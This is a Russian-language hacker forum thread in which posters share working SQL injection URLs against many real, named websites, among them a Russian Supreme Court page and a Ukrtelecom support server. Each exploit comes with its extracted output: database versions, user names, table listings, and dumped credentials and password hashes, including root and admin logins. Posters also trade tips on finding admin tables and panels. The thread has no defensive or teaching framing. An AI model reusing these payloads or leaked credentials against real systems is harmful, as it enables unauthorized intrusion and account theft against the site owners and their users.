SQL Инъекции

emagiC CMS.Net 4.0

 

Code:

http://[COLOR=Lime]www.lovestory.name[/COLOR]/?porno_video=-1+union+select+1,2,version(),user()/*

[email protected] 5.0.45-log Mb

Code:

http://[COLOR=Lime]www.gaylovespirit.org[/COLOR]/workshops_es.php?cat=1&wid=-1'+union+select+1,2,concat(user(),0x3a,version(),0x3a,database()),4,5,6,7/*

[email protected]:4.0.27B200335

Code:

http://[COLOR=Lime]www.loveandrespect.com[/COLOR]/content/article.php?aid=1+or+1=@@version--

'Microsoft SQL Server 2000

Code:

http://[COLOR=Lime]masterboat.ru[/COLOR]/index.php?D=3&id=-1+union+select+1,version(),3,4,5,user(),7,8,9,10,11,12,13,14/*&file=catalog&content=short_info

4.0.27 [email protected]

Code:

http://[COLOR=Lime]www.idmaster.co.uk[/COLOR]/idm_order.php?card_id=-1+union+select+1,version(),3,4,5,6,7,8/*

4.1.22-standard

Code:

http://[COLOR=Lime]www.gifts.master-board.ru[/COLOR]/mes.php?id=-1+union+select+1,2,3,database(),5,version(),7,user(),9,10/*

5.0.45-Max-log [email protected] mboardb7_mb

Code:

http://[COLOR=Lime]blog.pmaster.net[/COLOR]/post.php?id=-1+union+select+1,version(),3,4,5,user(),7,8,9,database(),11/*

4.1.22-log pmaste_blog@localhost pmaste_pmblog

Code:

http://[COLOR=Lime]www.immaster.net[/COLOR]/news_page.php?pag=&id=-1+union+select+1,2,version(),user(),5,6,database(),8,9/*

5.0.45-Dotdeb_0.dotdeb.1-log webulesti@localhost imm

Code:

http://[COLOR=Lime]www.immaster.net[/COLOR]/news_page.php?pag=&id=-1+union+select+1,2,user,password,5,6,7,8,9+from+mysql.user+limit+0,1/*

stud:52099bc10ef4f64c
root:0889eae004418834
omegas:75da24625a4cfb48

 

Code:

http://www.infoelekt.com/public/product_detail.php?id=-1262+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36/*

Code:

http://www.medsys.ru/index.phtml?mm=quest&sm=faq&ctype=15&cdir=-1+union+select+1,version(),user(),database(),5/*

 

Никак не могу найти пассы...

Code:

http://[COLOR=Olive]www.allianceforbiz.com[/COLOR]/events/specific_event.php?id=-89+union+select+concat_ws(0x3a,user(),database(),version()),2,3,4,5,6,7,8,9/*

alliance_shows@localhost/alliance_Show2005be/4.1.22-standard

 

emagiC CMS.Net 4.0

 

Code:

http://[COLOR=Olive]www.gesmer.com[/COLOR]/publications/article.php?ID=-172+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8/*  

oslegal@localhost/GU2/4.0.20

Code:

http://[COLOR=Olive]www.gesmer.com[/COLOR]/publications/article.php?ID=-172+union+select+1,password,3,4,5,user,7,8+from+mysql.user+limit+0,1/*

root:032c41e8435273a7:letmein

Code:

http://[COLOR=Olive]www.gesmer.com[/COLOR]/publications/article.php?ID=-172+union+select+1,password,3,4,5,user,7,8+from+mysql.user+limit+1,5/*  

oslegal:7c9fbfb223888670:

 

Access denied for user 'hweight'@'205.196.208.0/255.255.240.0' to database 'informati

http://www.honoluluweekly.com/cover/detail.php?id=-1+union+select+1,-1+union+select+1,column_name,3,4,5,6+from+information_schema.columns+where+table_name=CHAR(0x72,0x77,0x64,0x5F,0x75,0x73,0x65,0x72,0x73)/*

[email protected]

 

aifrostov.ru

Code:

http://www.aifrostov.ru/index.php?sec=rubr&id_st=-1227'+union+select+1,2,3,4,concat_ws(char(58),version(),user(),database()),6,7,8,9,10,11,12,13,14,15,16+from+news+--+

4.1.22:AIFROSTOV@LOCALHOST:AIFROSTOV

interstar.ua

Code:

http://www.interstar.ua/internet/index.php?id=-684+union+select+concat_ws(char(58),cast(table_name+as+binary))+from+information_schema.tables+limit+274,1+--+&main_menu=3

5.0.18-Max:webadmin@localhost:IStarmobile

seo-maker.ru

Code:

http://seo-maker.ru/news_out3.php?id=38392+union+select+1,concat_ws(char(58),version(),user(),database()),3,4,5,6,7+--+

4.1.20-log:a1777_3@localhost:a1777_3

baltportal.ru

Code:

http://baltportal.ru/index.php?type=500&idNews=-9490+union+select+1,2,concat_ws(char(58),version(),user(),database()),4,table_name,6,7,8,9,10,11,12,13,14,15,16+from+information_schema.tables+--+

5.0.45-community-log:nwlove_baltru@localhost:nwlove_baltru

 

http://support.kharkiv.ukrtelecom.ua/

Code:

http://support.kharkiv.[COLOR=DarkGreen]ukrtelecom.ua[/COLOR]/news/?id=1+unIon+SelEcT+null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,current_database()||chr(58)||version()||chr(58)||current_user,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--

Общая информация:
supportostgreSQL 7.3.18 on i686-pc-linux-gnu, compiled by GCC gcc (GCC) 3.2.2 20030222 (Red Hat Linux 3.2.2-5):reader
==========================================

Code:

http://support.kharkiv.ukrtelecom.ua/news/?id=1+unIon+SelEcT+null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,usename||chr(58)||passwd,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null+from+pg_user--

Выбераем пользователей с "паролями":
pgsql:********
postgres:********
reader:********
writer:********
===========================================

Code:

http://support.kharkiv.ukrtelecom.ua/news/?id=1+unIon+SelEcT+null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,usename,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null+from+pg_user+where+usesuper=true--

Выбераем привилегированных пользователей:
postgres

к сожелению вытащить пароль из pg_shadow не получится, мы работаем от пользователя ридер(
==========================================

Code:

http://support.kharkiv.ukrtelecom.ua/news/?id=1+unIon+SelEcT+null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,datname,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null+from+pg_database--

выбираем существующии базы:
balakleya
bogoduhiv
callcenter
chuguyiv
cit
dergachi
forum
Gallery
games
izum
kalendar
krasnograd
kupyansk
lozova
mtz
news
opros
orderdsl
Phone
pool
postgres
radio
rayon
sc
support
template0
template1
vodolaga
vovchansk

 

Code:

http://[COLOR=Olive]surcon.ru[/COLOR]/pages.php?id=-18+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5/*

[email protected]/vodos68_surcon/
4.0.25-standard

Code:

http://[COLOR=Olive]surcon.ru[/COLOR]/pages.php?id=-18+union+select+1,concat_ws(0x3a,login,mail,password),3,4,5+from+users+limit+0,15/*  

admin:123456

 

Народ к сожалению я нечего непонимаю в SQL Inj, но что мне делать вот такой ссылкой
http://192.168.99.8/modules.php?name=News&topic_id=3&pagenum='

 

HTML:

http://metalistfans.net/news.php?id=-939UNION%20SELECT%201,2,3,4,5,6,7,8,9/*

таблиц не нашёл ( КТо найдёт отпишитесь плз

HTML:

http://www.golodomor.org.ua/speech.php?id=-1562+UNION+SELECT+1,concat(user,0x3a,pass),3+From+users/*

 

2KEHT33

Code:

http://metalistfans.net/news.php?id=-939UNION%20SELECT%201,2,3,name,5,6,7,8,9%20from%20forum/*

а таблицы с админами там может и не быть вобще...
ЗЫ как видно имена таблиц идут без префикса, хотя не факт

еще там есть табличка teams

 

ну вот тут с префиксом и тоже не нашёл )

HTML:

http://soft.tomck.com/reiting.php?link=47+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/*

 

Код:

http://skr.su/?div=zakony&id=-111+union+select+1,2,3,4,5,6,7,8,9,10,concat(login,0x3a,pass),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45+from+users+limit+0,1/*

не понял что за пароли такие

 

Code:

http://[COLOR=Olive]ivanpro.org[/COLOR]/top_menu.php?id=-4+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,user(),database(),version()),9,10,11,12,13,14,15,16,17,18/*  

ivanproorg@localhost/ivanproorg/5.0.22-Debian_2-log

Code:

http://[COLOR=Olive]ivanpro.org[/COLOR]/top_menu.php?id=-4+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,admin_login,admin_pass,admin_mail),9,10,11,12,13,14,15,16,17,18+from+auto_ws_admin_option+limit+0,1/*  

admin:pass:www.websmith.ru
Админку не нашёл...

 

Tonikk:120853239:2e4b6dc525afb5cb

Alla2:asdf
Rahashanoiu:1
Lavel:asdf:0
Vesta:aszx:0
users>username>password>accesslevel
test:test:0

 

Верховный суд РФ

Code:

http://www.supcourt.ru/courts_m.php?b=-2005)+union+select+aes_decrypt(aes_encrypt(concat(user,0x3a,password),0x71),0x71)+from+mysql.user/*

работает на винде
мускул 5-ветки
пароли и логины пользователей БД по линку на странице
(их 3)


вот вывод всех таблиц и колонок:

Code:

http://www.supcourt.ru/courts_m.php?b=-2005)+union+select+aes_decrypt(aes_encrypt(concat(table_name,0x3a,column_name),0x71),0x71)+from+information_schema.columns/*

(сначала линки неправильные дал, из браузера скопировал неправильно, сейчас исправил, линки рабочие)

 

Code:

http://www.rotary.or.id/v20/news/detail.php?all=1&id=-1+union+select+1,2,version(),user(),5,database(),7,8,9

Округ 3400 Индонезии

Version: 4.1.20-log
User: [email protected]
Database: tsantoso_project

Бла, как ни старался подобрать таблицы - никак...

 

tomsknews.com

Code:

http://tomsknews.com/news/?id=-4128)+union+select+concat_ws(char(58),version(),user(),database())+--+

4.1.22-log:wttomsknews@localhost:wttomsknews

foodmedia.ru

Code:

http://www.foodmedia.ru/?space=5&article=-3912+union+select+concat_ws(char(58),version(),user(),database())+--+

4.1.22:food3@localhost:food-media

Code:

http://www.foodmedia.ru/?space=5&article=-3912+union+select+concat_ws(char(58),username,user_password,user_icq)+from+phpbb_users+limit+1,1+--+

admin:f6fdffe48c908deb0f4c3bd36c032e72:adminadmin